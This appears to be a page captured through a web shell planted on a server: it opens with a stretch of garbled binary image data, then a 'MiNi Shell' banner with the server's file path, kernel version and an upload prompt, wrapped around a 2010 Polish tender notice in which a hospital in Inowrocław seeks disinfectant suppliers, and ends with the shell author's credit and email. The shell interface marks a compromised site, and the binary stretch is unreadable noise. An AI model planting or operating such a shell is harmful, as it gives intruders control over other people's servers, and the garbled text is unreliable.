JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100118/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100118/14448-N-2010.html

<p class="kh_header"><b>Inowrocław: Przetarg nieograniczony M-2/2010</b><br>
<b>Numer ogłoszenia: 14448 - 2010; data zamieszczenia: 18.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Publiczny Specjalistyczny Zakład Opieki Zdrowotnej , ul. Poznańska 97, 88-100 Inowrocław, woj. kujawsko-pomorskie, tel. 052 3545587, faks 052 3574667.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.pszozino.lo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony M-2/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	P r z e d m i o t e m zamówienia jest :
Dostawa środków dezynfekcyjnych wg asortymentu i ilości wymienionych w Załączniku nr 2 do SIWZ.
2.	Przedmiot zamówienia został podzielony na pięć zadań. Zamawiający wyraża zgodę na składanie ofert na poszczególne zadania.
3.	Postępowanie, którego dotyczy niniejszy dokument oznaczone jest znakiem                           sprawy  M-2/2010.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> .  Wysokość wadium ustala się w  następujących kwotach:
     Zadanie Nr 1  - 2.700,00 zł
     Zadanie Nr 2  - 1.300,00 zł
     Zadanie Nr 3  - 1.600,00 zł
     Zadanie Nr 4  - 1.900,00 zł
     Zadanie Nr 5  -    300,00 zł
     Zadanie Nr 6  -    200,00 zł   
 2. Miejsce wnoszenia wadium w pieniądzu na wskazany rachunek bankowy:
              - Bank :  Kredyt Bank PBI S.A. O/Bydgoszcz
  		  Nr rachunku: 88150013601213600244300000 
      Wadium wnoszone w pieniądzu można wpłacać przelewem na wskazane konto. 
 3.Kserokopię dowodu przelewu potwierdzoną za zgodność z oryginałem należy dołączyć do oferty. 
 4. Wadium wnoszone w formie: poręczenia bankowego, gwarancji bankowej, gwarancji  ubezpieczeniowej lub poręczeniach udzielanych przez Polską Agencję Rozwoju Przedsiębiorczości, należy dołączyć do oferty w formie nienaruszonego oryginału lub zdeponować w kasie u Zamawiającego, a kopię załączyć do oferty.
 5. Z treści gwarancji (poręczenia) musi jednoznacznie wynikać, jaki jest sposób reprezentacji gwaranta. Gwarancja musi być podpisana przez upoważnionego (upełnomocnionego) przedstawiciela gwaranta. Podpis winien być sporządzony w sposób umożliwiający jego identyfikację np. złożony wraz z imienną pieczątką lub czytelny (z podaniem imienia i nazwiska). Z treści gwarancji winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez zamawiającego w terminie związania ofertą, zobowiązanie gwaranta do wypłaty zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust. 5 ustawy Prawo zamówień publicznych. 

    6. Wadium musi być wniesione najpóźniej do wyznaczonego terminu składania ofert.    tj. do dnia   27.01.2010r. godz. 9:30
    7.Wykonawca, który nie wniesie wadium lub nie zabezpieczy oferty akceptowalną formą
       wadium w wyznaczonym terminie zostanie wykluczony z postępowania.
    8.Dyspozycję w zakresie zwrotu wniesionych w pieniądzu wadiów wykonawców,
      Zamawiający przekaże do banku niezwłocznie po:
a)	wyborze najkorzystniejszej oferty,
b)	zawarciu umowy w sprawie zamówienia publicznego ,
c)	unieważnieniu postępowania o udzielenie niniejszego zamówienia    publicznego, za wyjątkiem Wykonawcy  , którego oferta została uznana za najkorzystniejszą
-z zastrzeżeniem art. 46  ust. 4 a ustawy Pzp.
          oraz niezwłocznie  na wniosek Wykonawcy , który wycofał ofertę przed upływem 
          terminu      spływania ofert.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia  mogą ubiegać się wykonawcy którzy spełniają warunki  dotyczące  :

a)	posiadania uprawnień do wykonywania określonej w przedmiocie zamówienia działalności lub czynności ; jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;   
b)	posiadania  wiedzy i doświadczenia,
c)	dysponowania odpowiednim  potencjałem technicznym i osobami zdolnymi do wykonania zamówienia,
d)	 sytuacji ekonomicznej i finansowej .
2.	W celu  wykazania spełniania  warunków, o których mowa powyżej  Wykonawca zobowiązany jest dołączyć do oferty następujące dokumenty:
a)   wykaz zrealizowanych i realizowanych usług w okresie ostatnich trzech lat przed dniem
      wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności
      jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością dostawom
      stanowiącym przedmiot zamówienia, w tym 1 dostawa odpowiadająca swoją wartością
      łącznej wartości  pozycji na które składana jest oferta , z podaniem ich wartości, 
      przedmiotu, dat wykonania i odbiorców, dokumenty potwierdzające, że usługi objęte
      wykazem, o którym mowa wyżej, zostały wykonane należycie;
b)	Sprawozdanie finansowe albo jego część, a jeżeli podlega ono badaniu przez biegłego
      rewidenta, zgodnie z przepisami o rachunkowości również z opinią odpowiednio o  
      badanym  sprawozdaniu albo jego części, a w przypadku wykonawców nie 
      zobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów
      określających obroty oraz zobowiązania i należności-za okres nie dłuższy niż 3 lata
      obrotowe, a jeżeli okres działalności jest krótszy-za ten okres.
c)	 koncesja na wytwarzanie i/lub obrót hurtowy środkami farmaceutycznymi

     Zamawiający   dokona oceny spełniania warunków na podstawie dokumentów
     dołączonych celem ich wykazania wymienionych w pkt. V.2 . 
3. W celu potwierdzenia, że przedmiot Zamówienia odpowiada wymaganiom   określonym     Zamawiającego, przedstawią:
a)	Wpis  lub zgłoszenie do Rejestru Wyrobów Medycznych i podmiotów odpowiedzialnych za ich wprowadzenie do obrotu i używania ( nie dotyczy klasy wyrobu medycznego I i IIa  pod warunkiem, że pierwsze jego wprowadzenie nastąpiło w innym niż Polska kraju Unii Europejskiej, zgodnie z przepisami ustawy z dnia 20.04.2004r. o Wyrobach Medycznych).
b)	Deklaracja zgodności producenta ( dotyczy wszystkich klas wyrobu medycznego ).
c)	Certyfikat CE wystawiony przez jednostkę notyfikowaną. Na certyfikacie CE
      musi być numer CE i pełne dane jednostki notyfikowanej (nie dotyczy klasy wyrobu I).</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art.  24 ust. 1  ustawy Prawo Zamówień Publicznych Wykonawca załączy następujące dokumenty i oświadczenia do oferty:
a)	Oświadczenie o braku podstaw do wykluczenia  
(Załącznik nr  3)
b)	Aktualny odpis z właściwego rejestru lub zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej 
      ( wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu  składania ofert)
c)	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczeń, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji organu podatkowego 
      ( wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania   ofert )
d)	Aktualne zaświadczenie z właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem opłat oraz składek na ubezpieczenia zdrowotne lub społeczne, lub zaświadczeń, że uzyskał przewidzianą prawem zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności
      ( wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert )
e)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt.  4-8 ustawy 
     (wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert)
f)	Aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1pkt 9 ustawy
(wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu   składania ofert)

2.	Jeżeli Wykonawca  wykazując spełnianie warunków, o których mowa w art.22 ust.    Ustawy Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2 b ustawy Pzp , Zamawiający żąda wykazania za pomocą dokumentów wymienionych wyżej (pkt. VI a-d SIWZ)  , iż w stosunku do tych podmiotów  nie zachodzą okoliczności wskazane  w art. 24 ust. 1 ustawy Pzp. 
3.	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej zamiast dokumentów o których mowa w Dziale: 
VI p.1 b,c,d,f SIWZ - składa się dokument lub dokumenty, wystawione w kraju, w 
którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio że:
       3.1.1. nie otwarto jego likwidacji ani nie ogłoszono upadłości
 3.1.2. nie zalega z uiszczeniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu
       3.1.3 nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
          3.2.VI p. 1e SIWZ -składa zaświadczenie właściwego organu sądowego lub 
               administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty 
              dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 Pzp.  
4. Oświadczenia należy składać w formie pisemnej,
5. Dokumenty mogą być składane w formie oryginału lub kopii poświadczonych za zgodność 
    z oryginałem przez wykonawcę ( dokumenty sporządzone w języku obcym są składane 
    wraz z tłumaczeniem na język polski poświadczonym przez wykonawcę).

VII.  DOKUMENTY POZOSTAŁE  STANOWIĄCE  INTEGRALNĄ  CZĘŚĆ  OFERTY
Oferta musi zawierać następujące dokumenty:
a)	 wypełniony formularz  -Oferta(zał. nr 1 i nr 2)
b)   dowód wniesienia wadium
c)    pełnomocnictwo do podpisywania oferty i składania ewentualnych wyjaśnień, jeżeli osobą podpisującą nie jest osoba upoważniona na podstawie wpisu z rejestru handlowego lub zaświadczenia o prowadzeniu działalności gospodarczej. Jeżeli pełnomocnictwo nie ma postaci aktu notarialnego powinno zawierać pieczęć Wykonawcy, imienną pieczątkę wystawiającego pełnomocnictwo i jego podpis.
d)  oświadczenie o terminie ważności oferowanych środków dezynfekcyjnych (min.12
      miesięcy od dnia   dostarczenia przedmiotu zamówienia do magazynu Zamawiającego). 
 e) opis części zamówienia, która zostanie powierzona podwykonawcy (jeżeli dotyczy). 
f) w przypadku  gdy Wykonawca będzie polegać na wiedzy, doświadczeniu innych
    podmiotów przedstawi w tym celu  pisemne zobowiązanie tych podmiotów do oddania mu 
    do dyspozycji  niezbędnych zasobów na okres korzystania  z nich przy wykonywaniu
    zamówienia..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.pszozino.lo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych PSZOZ Inowrocław ul. Poznańska 97 88-100 Inowrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 27.01.2010 godzina 09:30, miejsce: Sekretariat Z-cy Dyrektora ds, Techniczno-Administracyjnych PSZOZ Inowrocław ul. Poznańska 97 88-100 Inowrocław.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pakiet Nr 1.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do mycia i odkażania skóry i rąk.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pakiet nr 2.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do odkażania błon śluzowych.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pakiet nr 3.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do dezynfekcji powierzchni.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do dezynfekcji i mycia narzędzi i sprzętu endoskopowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Pakiet nr 5.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środki do maszynowej dezynfekcji, mycia  oraz konserwacji narzędzi.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Pakiet nr 6.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Środek aldehydowy do dezynfekcji narzędzi i sprzętu endoskopowego.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com